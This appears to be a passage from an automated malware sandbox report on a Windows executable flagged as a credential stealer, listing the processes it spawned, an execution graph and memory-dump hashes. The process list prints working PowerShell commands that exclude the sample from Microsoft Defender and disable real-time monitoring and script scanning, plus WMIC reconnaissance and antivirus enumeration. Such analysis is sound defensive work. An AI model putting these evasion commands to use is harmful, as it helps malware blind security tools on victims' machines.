                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                            x-ratelimit-limit: 5
                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                            x-ratelimit-reset: 1733902820
                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                            via: 1.1 google
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Np5VDrvgrqvDRLxUx6%2BKmWV7%2FaPoUpfZCt6ORwhF4SyjuL8As8OIff8C5J7pYUXbLXdqDWBTdHrDCxISPv%2BxTAt47grRwFy5fZag0kYFnp5J78ATW8w%2Bzj4TZsNM"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f03d3647b820f71-EWR
                                                                                                                            {"message": "Unknown Webhook", "code": 10015}


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:02:39:29
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\apDMcnqqWs.exe"
                                                                                                                            Imagebase:0x1ed082d0000
                                                                                                                            File size:190'464 bytes
                                                                                                                            MD5 hash:E09F55D421CB45340A8C97C217BA56CF
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:1
                                                                                                                            Start time:02:39:29
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\dllhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                            Imagebase:0x7ff642ec0000
                                                                                                                            File size:21'312 bytes
                                                                                                                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:02:39:33
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:02:39:33
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:02:39:36
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff717f30000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:02:39:39
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:02:39:39
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:02:39:45
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic.exe" os get Caption
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:02:39:45
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:10
                                                                                                                            Start time:02:39:46
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:02:39:46
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:02:39:47
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic.exe" csproduct get uuid
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:02:39:47
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:02:39:48
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:15
                                                                                                                            Start time:02:39:48
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:02:39:57
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic" path win32_VideoController get name
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:17
                                                                                                                            Start time:02:39:57
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:18
                                                                                                                            Start time:02:39:58
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:19
                                                                                                                            Start time:02:39:58
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:15.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:100%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 42930 7ffd34a42b43 42931 7ffd34a42b56 CryptUnprotectData 42930->42931 42933 7ffd34a42c53 42931->42933

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 7ffd3488f430-7ffd348a2d9a 2 7ffd348a2e3a-7ffd348a2e5c 0->2 3 7ffd348a2da0-7ffd348a2da6 0->3 9 7ffd348a2e5f-7ffd348a2e86 2->9 10 7ffd348a2eb3-7ffd348a2f04 2->10 3->2 5 7ffd348a2dac-7ffd348a2db2 3->5 7 7ffd348a2dc0-7ffd348a2dc6 5->7 8 7ffd348a2db4-7ffd348a2dba 5->8 12 7ffd348a2dc8-7ffd348a2ddf call 7ffd348803e8 7->12 13 7ffd348a2de0-7ffd348a2e39 call 7ffd3488be90 7->13 8->7 11 7ffd348a2e8d-7ffd348a2eb0 8->11 9->11 24 7ffd348a2f06-7ffd348a2f0c 10->24 11->24 25 7ffd348a2eb2 11->25 27 7ffd348a2f56 24->27 28 7ffd348a2f0e-7ffd348a2f39 24->28 25->10 30 7ffd348a2f98-7ffd348a2fb7 27->30 31 7ffd348a2f58-7ffd348a2f75 call 7ffd3489f0b8 27->31 33 7ffd348a2f3b-7ffd348a2f3e 28->33 34 7ffd348a2f92-7ffd348a2f95 28->34 69 7ffd348a2f7a-7ffd348a2f85 call 7ffd348a2f8c 31->69 39 7ffd348a2f40-7ffd348a2f42 33->39 40 7ffd348a2fbf-7ffd348a2fc3 33->40 35 7ffd348a2f97 34->35 36 7ffd348a2fdf-7ffd348a2fe9 34->36 35->30 45 7ffd348a2fef-7ffd348a3017 call 7ffd348a2ae0 36->45 46 7ffd348a2fbe 39->46 47 7ffd348a2f44 39->47 43 7ffd348a2fc6-7ffd348a2fc9 40->43 44 7ffd348a2fc4-7ffd348a2fc5 40->44 51 7ffd348a2fca-7ffd348a2fce 43->51 44->43 59 7ffd348a301c-7ffd348a30a8 45->59 46->40 52 7ffd348a2f86-7ffd348a2f8b 47->52 53 7ffd348a2f46-7ffd348a2f48 47->53 55 7ffd348a2fd0-7ffd348a2fd5 51->55 53->44 56 7ffd348a2f4a 53->56 61 7ffd348a2fd8-7ffd348a2fe8 55->61 62 7ffd348a2fd7 55->62 57 7ffd348a2f8c-7ffd348a2f90 56->57 58 7ffd348a2f4c-7ffd348a2f4e 56->58 57->34 58->51 63 7ffd348a2f50 58->63 72 7ffd348a30c5-7ffd348a3116 59->72 73 7ffd348a30aa-7ffd348a30c1 59->73 65 7ffd348a2fe9-7ffd348a2fea 61->65 66 7ffd348a2feb-7ffd348a2fed 61->66 62->61 63->34 67 7ffd348a2f52-7ffd348a2f54 63->67 65->66 66->45 67->27 67->55 69->52 78 7ffd348a311c-7ffd348a3134 call 7ffd34886a28 72->78 79 7ffd348a31cb-7ffd348a31cd 72->79 73->72 86 7ffd348a3136-7ffd348a3171 78->86 87 7ffd348a31a2-7ffd348a31b3 78->87 80 7ffd348a369a-7ffd348a36e5 call 7ffd34891c40 79->80 81 7ffd348a31d3-7ffd348a325b 79->81 98 7ffd348a32dd-7ffd348a32ee 81->98 99 7ffd348a3261-7ffd348a329f 81->99 86->87 90 7ffd348a31b5 87->90 91 7ffd348a31ba-7ffd348a31c8 87->91 90->91 91->79 100 7ffd348a32f5-7ffd348a3325 98->100 101 7ffd348a32f0 98->101 105 7ffd348a32b0-7ffd348a32d6 99->105 106 7ffd348a332b-7ffd348a333d 100->106 107 7ffd348a3690-7ffd348a3697 100->107 101->100 105->98 106->105 108 7ffd348a3343-7ffd348a334f 106->108 107->80 109 7ffd348a3355-7ffd348a3396 call 7ffd34886630 108->109 110 7ffd348a3519-7ffd348a3555 108->110 135 7ffd348a3398-7ffd348a33a1 109->135 112 7ffd348a3557-7ffd348a3560 110->112 113 7ffd348a3593-7ffd348a35aa 110->113 115 7ffd348a3572-7ffd348a3589 112->115 116 7ffd348a3562-7ffd348a3568 112->116 119 7ffd348a35ac-7ffd348a35bb 113->119 120 7ffd348a3614-7ffd348a364c 113->120 115->113 123 7ffd348a358b-7ffd348a358c 115->123 116->115 119->120 129 7ffd348a35bd-7ffd348a35c0 119->129 124 7ffd348a340e-7ffd348a342e 120->124 125 7ffd348a3652-7ffd348a368a 120->125 123->113 125->106 125->107 129->120 130 7ffd348a35c2-7ffd348a35c6 129->130 130->120 132 7ffd348a35c8-7ffd348a360f call 7ffd34890e38 130->132 132->120 137 7ffd348a33a6-7ffd348a33b3 135->137 140 7ffd348a33b5-7ffd348a33f2 call 7ffd3488f708 137->140 140->124
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HAw4$HAw4$HAw4$HAw4$Hcv4
                                                                                                                              • API String ID: 0-2105956836
                                                                                                                              • Opcode ID: b9c42fec5ac12430899a24939da0414557449913c1a8355edc7bba1ab5df891e
                                                                                                                              • Instruction ID: 8b1570ab38d96e9f1701ec84860680704c48e1abbc9af0ab9f490330b22ca565
                                                                                                                              • Opcode Fuzzy Hash: b9c42fec5ac12430899a24939da0414557449913c1a8355edc7bba1ab5df891e
                                                                                                                              • Instruction Fuzzy Hash: C152E531B09A4E4FDBD5EF28C8A46A977E1FF99310F0401BAD81DC7296DA78E852C750
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 31a4869b024f6341c71503d8504ff828689ab84300e85f4793aa385a69b41bcb
                                                                                                                              • Instruction ID: faa06263d98b28f3feb0cf3f40a9473030758eecdadd8b477f19c34928428b13
                                                                                                                              • Opcode Fuzzy Hash: 31a4869b024f6341c71503d8504ff828689ab84300e85f4793aa385a69b41bcb
                                                                                                                              • Instruction Fuzzy Hash: AF731675A1D3C54FD3669B2884A26A97BE0EF57308F1445BEC58ECB393DA386807C742

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1475 7ffd34a4a039-7ffd34a4a058 1476 7ffd34a4a0a2-7ffd34a4a0a6 1475->1476 1477 7ffd34a4a05a-7ffd34a4a076 1475->1477 1484 7ffd34a4a0ad-7ffd34a4a0b4 1476->1484 1478 7ffd34a4a0cf-7ffd34a4a0dc 1477->1478 1479 7ffd34a4a078-7ffd34a4a07b 1477->1479 1482 7ffd34a4a0de-7ffd34a4a0f9 1478->1482 1483 7ffd34a4a126-7ffd34a4a12b 1478->1483 1480 7ffd34a4a07d-7ffd34a4a09e call 7ffd34a49cd0 1479->1480 1481 7ffd34a4a0fc-7ffd34a4a109 1479->1481 1480->1476 1486 7ffd34a4a162-7ffd34a4a16b 1481->1486 1487 7ffd34a4a10b-7ffd34a4a10e 1481->1487 1482->1481 1493 7ffd34a4a12d-7ffd34a4a14b call 7ffd34a49cb0 1483->1493 1494 7ffd34a4a1ac-7ffd34a4a1ad 1483->1494 1484->1478 1491 7ffd34a4a16d-7ffd34a4a18d 1486->1491 1492 7ffd34a4a1b5-7ffd34a4a207 1486->1492 1489 7ffd34a4a18f-7ffd34a4a192 1487->1489 1490 7ffd34a4a110-7ffd34a4a112 1487->1490 1495 7ffd34a4a194-7ffd34a4a199 1489->1495 1496 7ffd34a4a114 1490->1496 1497 7ffd34a4a18e 1490->1497 1502 7ffd34a4a25f-7ffd34a4a263 1492->1502 1503 7ffd34a4a209-7ffd34a4a214 1492->1503 1556 7ffd34a4a150-7ffd34a4a161 call 7ffd34a4a162 1493->1556 1498 7ffd34a4a1af 1494->1498 1499 7ffd34a4a1b0-7ffd34a4a1b3 1494->1499 1501 7ffd34a4a19a-7ffd34a4a19b 1495->1501 1504 7ffd34a4a156-7ffd34a4a15b 1496->1504 1505 7ffd34a4a116-7ffd34a4a118 1496->1505 1497->1489 1498->1499 1499->1492 1508 7ffd34a4a19d 1501->1508 1509 7ffd34a4a19e 1501->1509 1514 7ffd34a4a265-7ffd34a4a297 1502->1514 1515 7ffd34a4a298-7ffd34a4a29c 1502->1515 1510 7ffd34a4a590-7ffd34a4a5b7 1503->1510 1511 7ffd34a4a21a-7ffd34a4a244 1503->1511 1513 7ffd34a4a15c-7ffd34a4a161 1504->1513 1505->1495 1512 7ffd34a4a11a 1505->1512 1508->1509 1519 7ffd34a4a1a0-7ffd34a4a1aa 1509->1519 1521 7ffd34a4a5ce-7ffd34a4a5df 1510->1521 1522 7ffd34a4a5b9-7ffd34a4a5ba 1510->1522 1536 7ffd34a4a24e-7ffd34a4a25e 1511->1536 1512->1513 1523 7ffd34a4a11c-7ffd34a4a11e 1512->1523 1513->1486 1514->1515 1517 7ffd34a4a2a2-7ffd34a4a2d1 1515->1517 1518 7ffd34a4a4b0-7ffd34a4a4d2 1515->1518 1545 7ffd34a4a549-7ffd34a4a55b call 7ffd34a4a5cd 1517->1545 1546 7ffd34a4a2d7-7ffd34a4a2f9 1517->1546 1527 7ffd34a4a4d9-7ffd34a4a4ec 1518->1527 1519->1494 1525 7ffd34a4a5e1-7ffd34a4a5f4 1521->1525 1526 7ffd34a4a629-7ffd34a4a639 1521->1526 1528 7ffd34a4a5bb-7ffd34a4a5cc 1522->1528 1523->1501 1529 7ffd34a4a120 1523->1529 1530 7ffd34a4a615-7ffd34a4a626 1525->1530 1531 7ffd34a4a5f6-7ffd34a4a601 1525->1531 1538 7ffd34a4a683-7ffd34a4a693 1526->1538 1539 7ffd34a4a63b-7ffd34a4a64e 1526->1539 1533 7ffd34a4a4ee-7ffd34a4a4f7 1527->1533 1534 7ffd34a4a52a-7ffd34a4a543 1527->1534 1529->1486 1537 7ffd34a4a122-7ffd34a4a124 1529->1537 1530->1526 1531->1530 1541 7ffd34a4a603-7ffd34a4a610 1531->1541 1543 7ffd34a4a509-7ffd34a4a520 1533->1543 1544 7ffd34a4a4f9-7ffd34a4a4ff 1533->1544 1534->1545 1534->1546 1536->1502 1537->1483 1537->1519 1547 7ffd34a4a6dd-7ffd34a4a6e1 1538->1547 1548 7ffd34a4a695-7ffd34a4a6d9 1538->1548 1549 7ffd34a4a66f-7ffd34a4a680 1539->1549 1550 7ffd34a4a650-7ffd34a4a65b 1539->1550 1541->1530 1543->1534 1575 7ffd34a4a522-7ffd34a4a523 1543->1575 1544->1543 1576 7ffd34a4a55d-7ffd34a4a565 call 7ffd34a4a5cd 1545->1576 1577 7ffd34a4a567-7ffd34a4a57a call 7ffd34a4a627 1545->1577 1564 7ffd34a4a36a-7ffd34a4a36c 1546->1564 1565 7ffd34a4a2fb-7ffd34a4a304 1546->1565 1553 7ffd34a4a6e3-7ffd34a4a6ec 1547->1553 1554 7ffd34a4a6ef-7ffd34a4a703 1547->1554 1550->1549 1551 7ffd34a4a65d-7ffd34a4a66a 1550->1551 1551->1549 1553->1554 1561 7ffd34a4a70e-7ffd34a4a71f 1554->1561 1562 7ffd34a4a705-7ffd34a4a70d 1554->1562 1571 7ffd34a4a721-7ffd34a4a729 1561->1571 1572 7ffd34a4a72a-7ffd34a4a73b 1561->1572 1562->1561 1569 7ffd34a4a37d-7ffd34a4a384 1564->1569 1570 7ffd34a4a36e-7ffd34a4a374 1564->1570 1578 7ffd34a4a375-7ffd34a4a37b 1565->1578 1588 7ffd34a4a306-7ffd34a4a309 1565->1588 1580 7ffd34a4a385-7ffd34a4a388 1569->1580 1570->1578 1571->1572 1581 7ffd34a4a73d-7ffd34a4a745 1572->1581 1582 7ffd34a4a746-7ffd34a4a7ca 1572->1582 1575->1534 1590 7ffd34a4a57c-7ffd34a4a584 call 7ffd34a4a627 1576->1590 1577->1590 1592 7ffd34a4a586-7ffd34a4a58d 1577->1592 1585 7ffd34a4a38a-7ffd34a4a46f 1578->1585 1580->1585 1581->1582 1603 7ffd34a4a7d0-7ffd34a4a806 1582->1603 1604 7ffd34a4a8d7-7ffd34a4a8df 1582->1604 1585->1527 1620 7ffd34a4a471-7ffd34a4a4ab call 7ffd34a49cf0 1585->1620 1588->1580 1594 7ffd34a4a30b-7ffd34a4a363 1588->1594 1590->1528 1592->1510 1594->1564 1610 7ffd34a4a83b-7ffd34a4a864 1603->1610 1611 7ffd34a4a808-7ffd34a4a839 1603->1611 1611->1610 1620->1576
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: -8_H$x$x4
                                                                                                                              • API String ID: 0-1198299985
                                                                                                                              • Opcode ID: ff72d6a81b68ff7fb5df10edb1249a7113316b504d3e3ec2d6db54dc01132f6d
                                                                                                                              • Instruction ID: f71cfc16cbf970a50b60c278941a4c6115d345210816f898361a79da8a7b75d0
                                                                                                                              • Opcode Fuzzy Hash: ff72d6a81b68ff7fb5df10edb1249a7113316b504d3e3ec2d6db54dc01132f6d
                                                                                                                              • Instruction Fuzzy Hash: 9B22F831A0CA498FEB94DF68C4A26EE77E1FF5A314F640179D44DC7392DA38A846C741
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: k7]H
                                                                                                                              • API String ID: 0-2606085808
                                                                                                                              • Opcode ID: bd36268636ebf6a0303576a00988ce585f17d407e5f7ecdef705fefbae0b0a25
                                                                                                                              • Instruction ID: 2ef95393a81eafe6bd11780d719afb093045550dcf0666e53c5f7f2f48f4e5b1
                                                                                                                              • Opcode Fuzzy Hash: bd36268636ebf6a0303576a00988ce585f17d407e5f7ecdef705fefbae0b0a25
                                                                                                                              • Instruction Fuzzy Hash: 1CB27630608A4A8FDBD8EF68C4A56A977E1FF59314F6005BDD459CB296CF39E842CB40

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
